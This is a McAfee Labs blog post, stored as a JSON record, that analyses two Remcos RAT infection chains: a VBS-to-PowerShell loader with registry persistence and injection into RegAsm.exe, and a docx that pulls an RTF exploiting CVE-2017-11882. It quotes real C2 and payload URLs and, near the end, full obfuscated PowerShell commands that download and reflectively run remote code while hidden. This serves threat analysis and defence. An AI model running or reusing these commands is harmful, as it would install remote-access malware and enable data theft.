{"id":206036,"date":"2024-12-11T00:38:14","date_gmt":"2024-12-11T08:38:14","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=206036"},"modified":"2025-06-06T01:40:15","modified_gmt":"2025-06-06T08:40:15","slug":"the-stealthy-stalker-remcos-rat","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-stealthy-stalker-remcos-rat\/","title":{"rendered":"The Stealthy Stalker: Remcos RAT"},"content":{"rendered":"

Authored By Sakshi Jaiswal, Anuradha M<\/em><\/p>\n

In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in the world of cybersecurity, gaining traction with its ability to infiltrate systems and compromise sensitive data. This malware, often delivered through phishing emails and malicious attachments, allows cybercriminals to remotely control infected machines, making it a powerful tool for espionage, data theft, and system manipulation. As cyberattacks become more sophisticated, understanding the mechanisms behind RemcosRAT and adopting effective security measures are crucial to protecting your systems from this growing threat. This blog presents a technical analysis of two RemcosRAT variants<\/p>\n

The heat map below illustrates the prevalence of Remcos in the field in Q3,2024<\/em><\/strong><\/p>\n

 <\/p>\n

\"\"<\/p>\n

Figure 1: Remcos heat map<\/span><\/figcaption><\/figure>\n

Variant 1: <\/strong><\/h2>\n

In the first variant of Remcos, executing a VBS file triggers a highly obfuscated PowerShell script that downloads multiple files from a command-and-control (C2) server. These files are then executed, ultimately leading to their injection into RegAsm.exe, a legitimate Microsoft .NET executable.<\/p>\n

Infection Chain<\/strong><\/h2>\n

\"\"<\/p>\n

Figure 2: Infection Chain of variant 1<\/span><\/figcaption><\/figure>\n

Analysis:<\/strong><\/h2>\n

Executing the VBS file initially triggers a Long-Obfuscated PowerShell command.<\/p>\n

\"\"<\/p>\n

Figure 3: Obfuscated PowerShell command<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

 <\/p>\n

It uses multi-layer obfuscation, and after de-obfuscation, below is the final readable content.<\/p>\n

\"\"<\/p>\n

Figure 4: De-Obfuscated code<\/span><\/figcaption><\/figure>\n

 <\/p>\n

The de-obfuscated PowerShell script performs the following actions:<\/p>\n

    \n
  1. Firstly, the script checks if the PowerShell version is 2.0. then the file will be downloaded from Googledrive \u201c’https:\/\/drive.google.com\/uc?export=download&id=<\/a>‘\u201c in Temp location. and if PowerShell version is not 2.0 then it downloads string from ftp server.<\/li>\n
  2. It creates a copy of itself in the startup location – \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<\/strong><\/li>\n<\/ol>\n

    \"\"<\/p>\n

    Figure 5: Self-copy location<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

     <\/p>\n

      \n
    1. In this case, since the PowerShell version is not 2.0, it will download strings from the FTP server.<\/li>\n
    2. Uses FTP to download DLL01.txt file, from \u201cftp:\/\/desckvbrat1@ftp.desckvbrat.com.br\/Upcrypter\/01\/DLL01.txt<\/a>\u201d with the username:desckvbrat1 and password: *******************as mentioned in the PowerShell script. Using FileZilla with the provided username and password to download files.<\/li>\n<\/ol>\n

      \"\"<\/p>\n

      Figure 6: Download file from FTP server<\/span><\/span><\/span>\u00a0<\/figcaption><\/figure>\n

       <\/p>\n

        \n
      1. It has 3 files DLL01.txt, Entry.txt and Rumpe.txt, which contains a URL that provides direct access to a snippet hosted on the PasteCode.io platform.<\/li>\n<\/ol>\n

        DLL01.txt File<\/strong><\/p>\n

        \"\"<\/p>\n

        Figure 7: DLL01.txt content<\/span><\/span><\/span>\u00a0<\/figcaption><\/figure>\n

         <\/p>\n

        \"\"<\/p>\n

        Figure 8: Snippet which is hosted on PasteCode.io of DLL01.txt<\/span><\/span><\/p>\n


        \nThe snippet above is encoded, after decoding it, we are left with the ClassLibrary3.dll file.<\/span><\/p>\n<\/figcaption><\/figure>\n

        \"\"<\/p>\n

        Figure 9: ClassLibrary3.dll<\/span><\/figcaption><\/figure>\n

        Rumpe.txt String<\/strong><\/p>\n

        \"\"<\/p>\n

        Figure 10: Rumpe.txt content<\/span><\/span><\/span>\u00a0<\/figcaption><\/figure>\n

        \"\"<\/p>\n

        Figure 11: Snippet which is hosted on PasteCode.io of Rumpe.txt<\/span><\/p>\n

         <\/p>\n

        The snippet above is encoded, Decoding it generates ClassLibrary1.dll file.<\/p>\n

        \"\"<\/p>\n

        Figure 12: ClassLibrary1.dll<\/span><\/figcaption><\/figure>\n

        Entry.txt<\/strong><\/p>\n

        \"\"<\/p>\n

        Figure 13: Entry.txt content<\/span><\/span><\/figcaption><\/figure>\n

         <\/p>\n

        \"\"<\/p>\n

        Figure 14: Snippet which is hosted on PasteCode.io of Entry.txt<\/span><\/span><\/figcaption><\/figure>\n

         <\/p>\n

          \n
        1. Last line of long PowerShell script – [System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType(‘ClassLibrary3.Class1’).GetMethod( ‘prFVI’ ).Invoke( $null , [object[]] ( ‘txt.sz\/moc.gnitekrame-uotenok\/\/:sptth<\/a>‘ , $hzwje , ‘true’ ) ); This line loads a .NET assembly into the current application domain and invokes it.<\/li>\n
        2. \u201ctxt.sz\/moc.gnitekrame-uotenok\/\/:sptth<\/a>\u201d The string is a reversed URL. When reversed, it becomes: https:\/\/koneotemarket.com\/zst.txt<\/a>. The raw data hosted in that location is base64 encoded and stored in reversed order. Once decoded and reversed, the content is invoked for execution.<\/li>\n<\/ol>\n

          \"\"<\/p>\n

          Figure 15: Base64 encoded Content<\/span><\/span><\/figcaption> <\/figure>\n
            \n
          1. After invocation, it creates a directory in AppData\/Local\/Microsoft<\/strong>, specifically within the LocalLow<\/strong> folder. It then creates another folder named “System Update”<\/strong> and places three files inside it.<\/li>\n<\/ol>\n

            The LocalLow <\/strong>folder is a directory in Windows used to store application data that requires low user permissions. It is located within the AppData folder. The two paths below show how the malware is using a very similar path to this legitimate windows path.<\/p>\n

            legitimate Path: C:\\Users\\<YourUsername>\\AppData\\LocalLow<\/p>\n

            Mislead Path: C:\\Users\\<YourUsername>\\AppData\\Local\\Microsoft\\LocalLow<\/strong><\/p>\n

            In this case, a LocalLow <\/strong>folder has been created inside the Microsoft directory to mislead users into believing it is a legitimate path for LocalLow<\/strong>.<\/p>\n

            A screenshot of the files dropped into the System Update folder<\/strong> within the misleading LocalLow directory highlights the tactic used to mimic legitimate Windows directories, intending to evade user suspicion.<\/p>\n

            \"\"<\/p>\n

            Figure 16: Screenshot of dropped files into System Update directory<\/span><\/figcaption><\/figure>\n

             <\/p>\n

            Content of x3.txt<\/p>\n

            \"\"<\/p>\n

            Figure 17: x3.txt content<\/span><\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            Then x2.ps1 is executed. Content of x2.ps1
            \n\"\"<\/p>\n

            Figure 18: x2.ps1 content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            The command adds a new registry entry in the Run key of the Windows Registry under HKCU (HKEY_CURRENT_USER). This entry ensures that a PowerShell script (yrnwr.ps1) located in the System Update folder inside the misleading LocalLow directory is executed at every user login.<\/p>\n

            \"\"<\/p>\n

            Figure 19: HKCU Run Registry entry for persistence<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            After adding registry entry, it executes yrnwr.ps1 file. Content of yrnwr.ps1 which is obfuscated.<\/p>\n

            \"\"<\/p>\n

            Figure 20: Obfuscated PowerShell content<\/span><\/figcaption><\/figure>\n

             <\/p>\n

            After Decoding yrnwr.ps1<\/p>\n

             <\/p>\n

            \"\"<\/p>\n

            Figure 21: De-obfuscated PowerShell content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            \"\"<\/p>\n

            Figure 22: Last line of script<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            It utilizes a process injection technique to inject the final Remcos payload into the memory of RegAsm.exe, a legitimate Microsoft .NET executable.<\/p>\n

            \"\"<\/p>\n

            Figure 23: Process Tree<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            Memory String of RegAsm.exe which shows the traces of Remcos<\/p>\n

            \"\"<\/p>\n

            Figure 24: Keylogger related Strings in memory dump<\/span><\/span><\/figcaption><\/figure>\n

             <\/p>\n

            \"\"<\/p>\n

            Figure 25: Remcos related String in memory dump<\/span><\/span><\/figcaption><\/figure>\n

             <\/p>\n

            \"\"<\/p>\n

            Figure 26: Remcos Mutex creation String in memory dump<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            Mutex Created<\/strong><\/h2>\n

            \"\"<\/p>\n

            Figure 27: Mutex creation<\/span><\/span><\/figcaption><\/figure>\n

             <\/p>\n

            A log file is stored in the %ProgramData% directory, where a folder named “1210” is created. Inside this folder, a file called logs.dat is generated to capture and store all system logging activities.<\/p>\n

            \"\"<\/p>\n

            Figure 28: Logs.dat file to capture all keystroke activity.<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            \"\"<\/p>\n

            Figure 29: Strings in payload<\/span><\/figcaption><\/figure>\n

             <\/p>\n

            Finally, it deletes the original VBS sample from the system.<\/p>\n

            Variant 2 – Remcos from Office Open XML Document:<\/strong><\/h2>\n

            This variant of Remcos comes from Office Open XML Document. The docx file comes from a spam email as an attachment.<\/p>\n

            Infection Chain:<\/strong><\/p>\n

            \"\"<\/p>\n

            Figure 30: Infection Chain of variant 2<\/span><\/figcaption><\/figure>\n

            Email Spam:<\/strong><\/p>\n

            \"\"<\/p>\n

            Figure 31: Spam Email<\/span><\/span><\/figcaption><\/figure>\n

             <\/p>\n

            The email displayed in the above image contains an attachment in the form of a .docx file, which is an Office Open XML document.<\/p>\n

            Analysis:<\/strong><\/h3>\n

            From the static analysis of .docx file, it is found that the malicious content was present in the relationship file \u201csetting.xml.rels\u201d. Below is the content of settings.xml.rels file:<\/strong><\/p>\n

            \"\"<\/p>\n

            Figure 32: rels file content<\/span><\/figcaption><\/figure>\n

             <\/p>\n

            From the above content,it is evident that it downloads a file from an external resource which points to a URL hxxps:\/\/dealc.me\/NLizza.<\/p>\n

            The downloaded file is an RTF document named \u201cseethenewthingswhichgivenmebackwithentirethingstobegetbackonlinewithentirethingsbackwithentirethinsgwhichgivenmenewthingsback_______greatthingstobe.doc\u201d<\/strong>which has an unusually long filename.<\/p>\n

            The RTF file is crafted to include CVE-2017-11882 Equation Editor vulnerability which is a remote code execution vulnerability that allows an attacker to execute arbitrary code on a victim’s machine by embedding malicious objects in documents.<\/p>\n

            Upon execution, the RTF file downloads a VBS script from the URL \u201chxxp:\/\/91.134.96.177\/70\/picturewithmegetbacktouse.tIF\u201d<\/strong> to the %appdata% directory, saving it as \u201cpicturewithmegetbacktouse.vbs\u201d.<\/strong><\/p>\n

            Below is the content of VBS file:<\/strong><\/p>\n

            \"\"<\/p>\n

            Figure 33: VBS Obfuscated content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            \"\"<\/p>\n

            Figure 34: VBS Obfuscated content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            The VBScript is highly obfuscated, employing multiple layers of string concatenation to construct a command. It then executes that command using WScript.Shell.3ad868c612a6<\/p>\n

            Below is the de-obfuscated code:<\/strong><\/p>\n

            \"\"<\/p>\n

            Figure 35: De-Obfuscated Content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n

             <\/p>\n

            \"\"<\/p>\n

            Figure 36: De-Obfuscated Content<\/span><\/span><\/figcaption><\/figure>\n

             <\/p>\n

            The above code shows that the VBS file launches PowerShell using Base64 encoded strings as the command.<\/p>\n

            Below is the 1st PowerShell command line:<\/strong><\/p>\n

            “C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -command $Codigo = ‘LiAoIChbc3RyaW5HXSR2ZXJCT1NFUFJFZmVSRU5jRSlbMSwzXSsneCctam9JTicnKSgoKCd7MH11cmwgJysnPSB7Mn1odHRwczovLycrJ3JhJysndy4nKydnaScrJ3QnKydodScrJ2J1Jysnc2VyJysnY29uJysndGVuJysndCcrJy5jb20vTm8nKydEJysnZScrJ3QnKydlYycrJ3RPbi9Ob0RldCcrJ2VjdCcrJ09uL3JlZicrJ3MnKycvJysnaGVhZHMvbWFpbi9EZXRhaCcrJ05vJysndCcrJ2gnKyctVicrJy50eHR7MicrJ307JysnIHswfWJhJysnc2UnKyc2JysnNEMnKydvbnQnKydlJysnbicrJ3QgPSAnKycoTmV3JysnLU9iaicrJ2UnKydjJysndCBTeXMnKyd0ZW0uTmUnKyd0LicrJ1dlYicrJ0MnKydsaWVudCkuRCcrJ28nKyd3bmwnKydvYScrJ2RTdHInKydpbicrJ2coJysneycrJzB9dScrJ3JsKTsgeycrJzAnKyd9JysnYmluYXJ5QycrJ29udGUnKyduJysndCA9JysnICcrJ1tTJysneXN0JysnZW0uQ28nKydudmUnKydydCcrJ10nKyc6OkYnKydyb21CYXNlNjRTdHJpbicrJ2coezB9YmFzZScrJzYnKyc0QycrJ29udGUnKydudCcrJyknKyc7IHsnKycwfScrJ2FzcycrJ2UnKydtYmx5JysnID0nKycgWycrJ1JlZmxlY3QnKydpb24uQXNzZW1ibCcrJ3ldJysnOjpMJysnbycrJ2FkKHswfWJpbicrJ2FyeUMnKydvbicrJ3QnKydlbnQpOyBbZG5saScrJ2IuSU8uSG9tJysnZScrJ106OlZBSSh7JysnMX0nKyd0JysneCcrJ3QuJysnQ1ZGR0dSLzA3Lzc3JysnMS42OS4nKyc0MycrJzEuMScrJzkvLycrJzpwJysndHRoezEnKyd9LCB7JysnMScrJ30nKydkZXNhdGl2YWRvezEnKyd9LCB7MX1kZXMnKydhdGknKyd2YWQnKydvezF9LCB7MX1kZXMnKydhdCcrJ2knKyd2YWRvezF9LCcrJyB7MScrJ31SZScrJ2dBJysncycrJ217JysnMX0sJysnIHsnKycxfXsnKycxfSwnKyd7MX17MX0pJyktZiAgW2NIYVJdMzYsW2NIYVJdMzQsW2NIYVJdMzkpICk=’;$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD<\/p>\n

            Base64 decoded content:<\/strong><\/p>\n

            \"\"<\/p>\n

            Figure 37: Base64 decoded content<\/span><\/figcaption><\/figure>\n

             <\/p>\n

            The above base64 decoded content is used as input to the 2nd PowerShell command.<\/p>\n

            Below is the 2nd PowerShell command line:<\/strong><\/p>\n

            “C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -windowstyle hidden -executionpolicy bypass -NoProfile -command “. ( ([strinG]$verBOSEPREfeRENcE)[1,3]+’x’-joIN”)(((‘{0}url ‘+’= {2}https:\/\/’+’ra’+’w.’+’gi’+’t’+’hu’+’bu’+’ser’+’con’+’ten’+’t’+’.com\/No’+’D’+’e’+’t’+’ec’+’tOn\/NoDet’+’ect’+’On\/ref’+’s’+’\/’+’heads\/main\/Detah’+’No’+’t’+’h’+’-V’+’.txt{2’+’};’+’ {0}ba’+’se’+’6’+’4C’+’ont’+’e’+’n’+’t = ‘+'(New’+’-Obj’+’e’+’c’+’t Sys’+’tem.Ne<\/a>‘+’t.’+’Web’+’C’+’lient).D’+’o’+’wnl’+’oa’+’dStr’+’in’+’g(‘+'{‘+’0}u’+’rl); {‘+’0’+’}’+’binaryC’+’onte’+’n’+’t =’+’ ‘+'[S’+’yst’+’2024 \u2013 New<\/a> ‘+’nve’+’rt’+’]’+’::F’+’romBase64Strin’+’g({0}base’+’6’+’4C’+’onte’+’nt’+’)’+’; {‘+’0}’+’ass’+’e’+’mbly’+’ =’+’ [‘+’Reflect’+’ion.Assembl’+’y]’+’::L’+’o’+’ad({0}bin’+’aryC’+’on’+’t’+’ent); [dnli’+’b.IO.Hom’+’e’+’]::VAI({‘+’1}’+’t’+’x’+’t.’+’CVFGGR\/07\/77’+’1.69.’+’43’+’1.1’+’9\/\/’+’:p’+’tth{1’+’}, {‘+’1’+’}’+’desativado{1’+’}, {1}des’+’ati’+’vad’+’o{1}, {1}des’+’at’+’i’+’vado{1},’+’ {1’+’}Re’+’gA’+’s’+’m{‘+’1},’+’ {‘+’1}{‘+’1},’+'{1}{1})’)-f [cHaR]36,[cHaR]34,[cHaR]39) )”<\/p>\n